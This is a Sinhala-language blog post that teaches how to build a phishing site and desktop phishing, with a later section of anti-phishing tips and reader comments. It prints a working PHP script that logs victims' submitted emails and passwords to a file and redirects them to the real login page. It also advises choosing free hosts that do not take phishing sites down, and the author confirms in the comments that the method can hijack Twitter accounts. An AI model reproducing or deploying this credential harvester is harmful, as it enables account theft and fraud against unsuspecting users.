Phishing site / Desktop Phishing එකක් උපයෝහි කරගෙන password වලට ගේම දිම හා ඒවා වලින් ආරක්ෂා විම .

3
  • Apr 12, 2010
  • C0de BlUe
  • Labels: ,

  • Share/Bookmark අද නම් video එක කලේ හොදටම බිලා (අනේ වරදවා තෙරුම් ගන්න එපා ; හෙන බුදිමතේ !!!) :P තැන් දෙකක විතර හෙනම බුදිමතෙ කලේ. අද mic එකේ පොඩි අවුලක් තිබුන නිසා ( volume එක අඩුකරලා audio input වල ; නංගි ගොත පැටියගේ වැඩ තමා :P) සද්දේ අඩුවෙන් තමා record වෙලා තියන්නේ , පස්සේ තමා දැනගත්තේ volume එක අඩුකරලා කියලා audio input වල (අනේ මන්දා ඒ වෙලාවේ මැරෙන්න බුදිමත නිසා මුලින්ම audio testing පාරක්වත් දාන්න බැරිවුණා ; හපෝ මට ආයි video එකක් කරන්න තරම් ඇ‍ඟේ kick එකක් තිබ්බ නැති නිසා මම ආයි video එක කලේ නෑ [අයියෝ මට සමාව දෙත්වා !!!]). හරි හරි අවුලක් නෑ , video 2 කම බලලා කොමෙන්ට් එකක් දාලම යන්නකෝ !!!

    Video Part 1



    Video Part 2



    අවශ්‍ය PHP කේතය :


    <?php
    if (!($fp = fopen('password.txt', 'a'))) {
    return;
    
    }
    
    fprintf($fp, "Email = %s Password = %s", $_POST["email"], $_POST["pass"]);
    header("Location: [Real Login page URL ; the page URL that you want to redirect]");
    exit;
    ?>
    



    PHP Enable Web hosting :

    www.t35.com
    www.yourfreehosting.net
    www.drivehq.com
    www.esmartstart.com

    more :  

    * Note : සමහර වෙබ් hosting වල spider bots ලා ඉන්න පුලුවන් ස්වයංක්‍රියව phishing sites delete කරන , ඒක නිසා ටිකක් හොයලා බලලා hosting provider ව තෝරගන්න  [ උදා : 110mb.com , 000webhost.com , byethost.com ] .

     
    Update : =========================================================================
    Desktop Phishing




    Video Part 1



    Video Part 2



    =========================================================================

    Phishing  වලින් ආරක්ෂා විමට අනුගමනය කලයුතු පියවර 



    * හැමවෙලාවෙම site එකේ URL එක ගැන සැලකිලිමත් වෙන්න.

    * ඔබ  URL එක හෝ අදාල වෙබ් අඩ්වියක් හඳුනාගැනිමට අපහසු වුවහොත් පළමුව වැරදිසහගත username එකක් හා passowrd එකක් ලබාදෙන්න . මන්දයත් එවිට Phishing වෙබ් පි‍ටුවක් තිබුනහොත් එම දුන් වැරදි username එකක් හා passowrd ගෙන ඔබව අදාල ඇත්ත වෙබ් අඩවියට redirect කරනු ඇත .(මෙම ක්‍රමය සමහරවිට Desktop Phishing වලට අදාල නොවෙන්නට පුලුවන) .


    * බොහෝවිට ජනප්‍රිය වෙබ් අඩවි වල Login Page එක SSL Encryption කර ඇත , එවිට එහි URL පටන්ගනුයේ "https" ලෙසය . එම නිසා නිතරම මෙම "https" සළකුණ ගැන අවධානයෙන් සිටිම වැදගත්ය ( * මෙම SSL ENCRYPTION ක්‍රියාවලිය සෑම වෙබ් අඩවියකම නොතිබේ ) .

    * කවමදාවත් E - mail ලිපියක ඇති URL එකක් Click නොකරන්න . එම අදාල URL එක  Address bar එකට පිටපත් කරගෙන අදාල වෙබ් පි‍ටුවට පිවිසෙන්න .

    * කවමදාවත් නොදන්න වෙබ් අඩවි වලට තමන්ගේ Debit / Credit වැනි Card වල ping  numbers නොදෙන්න .

    * නොදන්න අයගෙන් එන E - mail  වලට ප්‍රතිචාර නොදක්වන්න .

    * සෑම විටම  වෙබ් ලිපිනය Address bar එකේ  ටයිප් කර හෝ Bookmark ආධාරයෙන් අදාල වෙබ් අඩවි වලට පිවිසෙන්න .


    * ඔබ යන වෙබ් අඩ්වියේ Validate Certificate එක validate නතැයි කියා message එකක් පැමිණියේ නම් එවැනි වෙබ් අඩවිවලට නොපිවිසෙන්න .

    * යම් කිසිහෙයකින් මා ඉහත පෙන්නු Desktop Phishing  විඩියෝවේ පෙන්වා ඇති පරිදි අදාල වෙබ් අඩවියේ Main / Login page එක පමණක් පැමිණ , එම අදාල වෙබ් අඩවියෙම අනෙකුත් වෙබ් ලිපින වලට  "URL not Found" හෝ "404 error" වැනි පණිවිඩ පැමියහොත් වහාම අදාල පරිඝණකයේ hosts file (Windows වල නම් තියන්නේ : C:\WINDOWS\system32\drivers\etc වල ; මේකෙන් කෙරෙන්නේ වෙබ් ඩොමේන් නාමයත් IP ලිපිනයත් මැප් කිරීමයි.) එකට  ගොස් 127.0.0.1 - localhost  එකට අමතරව IP ලිපිනයක් සමඟ වෙනත් වෙබ් අඩවියක් තිබෙනම් ඒ ගැන සැලකිලිමත් වි අදාල වෙනස්කම් නිවැරදි කොට යාවත්කාලින කරනලද Virus guard එකක් මඟින් වහාම මුලු පරිඝණයකම පරික්ෂාවට ලක් කරන්න .


    * යම් කිසි මෘදුකාංගයක් ස්තාපනය කිරිමෙන් පසු එය යම් හෙයකින් virus යැයි ඇල්ලුවහොත් , වහාම ඉහත පියවරේ සඳහන් කල පරිදි hosts file එක පරික්ෂා කිරිම වඩා සුදුසුය .

    3 comments:

    1. ශාකුන්තල said...
    2. මේ පෝස්ට් එකට නං මම තදබල ලෙස විරෝධතාව දක්වනවා. කී දෙනෙක් මේකෙන් අයුතු ප්‍රයෝජන ගනීවි කියලද හිතන්නේ?

      මීට වඩා කියවන අයට ප්‍රයෝජනයක් වෙනවා phishing වලින් ආරක්ෂා වෙන්න ඉඟි ටිකක් ලිව්වනම්.

      http://www.crime-research.org/analytics/2176/

      ඒ වගේම මේ පෝස්ට් එක ශ්‍රී ලංකාවේ පරිගණක අපරාධ නීතිය යටතේත් වරදක් ලෙස සලකන්න පුළුවන්.

    3. Pubudu Kodikara said...
    4. Mchn.... twitter account ekak hack keraganna dannawada? :D

    5. හිඟන්නා said...
    6. @ ශාකුන්තල අයියා : ඔන්න අයියා කියුව නිසාම phishing වලින් ආරක්ෂා වෙන්න ඉඟි ටිකක් ලිව්වා . අප්පේ ඔන්න මට නම් තව බනින්න එපා හොඳේ !!!

      @ Pubudu : ඇයි බන් මම උඩ කියලා තියන විදිහට twitter එකක් වුනත් හැක් කරන්න පුලුවන්. lol

    Post a Comment

    write your comments here!

    Related Posts with Thumbnails